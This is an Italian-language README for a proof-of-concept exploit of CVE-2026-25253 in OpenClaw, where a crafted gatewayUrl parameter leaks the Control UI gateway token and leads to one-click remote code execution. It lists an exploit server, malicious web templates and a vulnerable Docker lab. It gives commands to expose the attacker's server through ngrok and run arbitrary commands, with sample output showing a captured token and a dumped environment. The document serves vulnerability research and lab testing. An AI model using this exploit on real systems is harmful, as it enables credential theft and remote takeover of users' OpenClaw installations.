
Proof-of-concept di exploit per CVE-2026-25253 in OpenClaw: un gatewayUrl appositamente creato esfiltra il token del gateway della Control UI, consentendo l'accesso non autorizzato al gateway e l'esecuzione di codice in remoto con 1 clic.
★ CVE-2026-25253 OpenClaw Remote Code Execution 1-Click PoC ★
https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e
CVE-2026-25253 : Vulnerabilità di esfiltrazione del token di autenticazione di OpenClaw
description: OpenClaw (noto anche come clawdbot o Moltbot) precedente alla v2026.1.29 consente agli attaccanti di esfiltrare un token di autenticazione del gateway memorizzato fornendo un valore craftato del parametro query-string gatewayUrl alla Control UI, che stabilisce automaticamente una connessione WebSocket senza validazione o conferma dell'utente. Ciò può portare ad accesso non autorizzato al gateway ed esecuzione di codice remoto con 1-click.
Dockerfile — build dell'ambiente vulnerabile OpenClawtemplates/ — pagine web malevole utilizzate dall'exploitconfig.txt — configurazione di OpenClaw utilizzata nell'ambiente vittimaexploit.py — server di exploitrequirements.txt — dipendenze del PoCdocker build -t openclaw-vuln .
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
http://127.0.0.1:18789/
d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66config.txtpip3 install -r requirements.txt
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"
Esempio:
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
==================================================
[!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================
Pubblichiamo analisi di CVE e malware una volta al mese. Se siete interessati, seguite i link sottostanti per consultare le nostre pubblicazioni.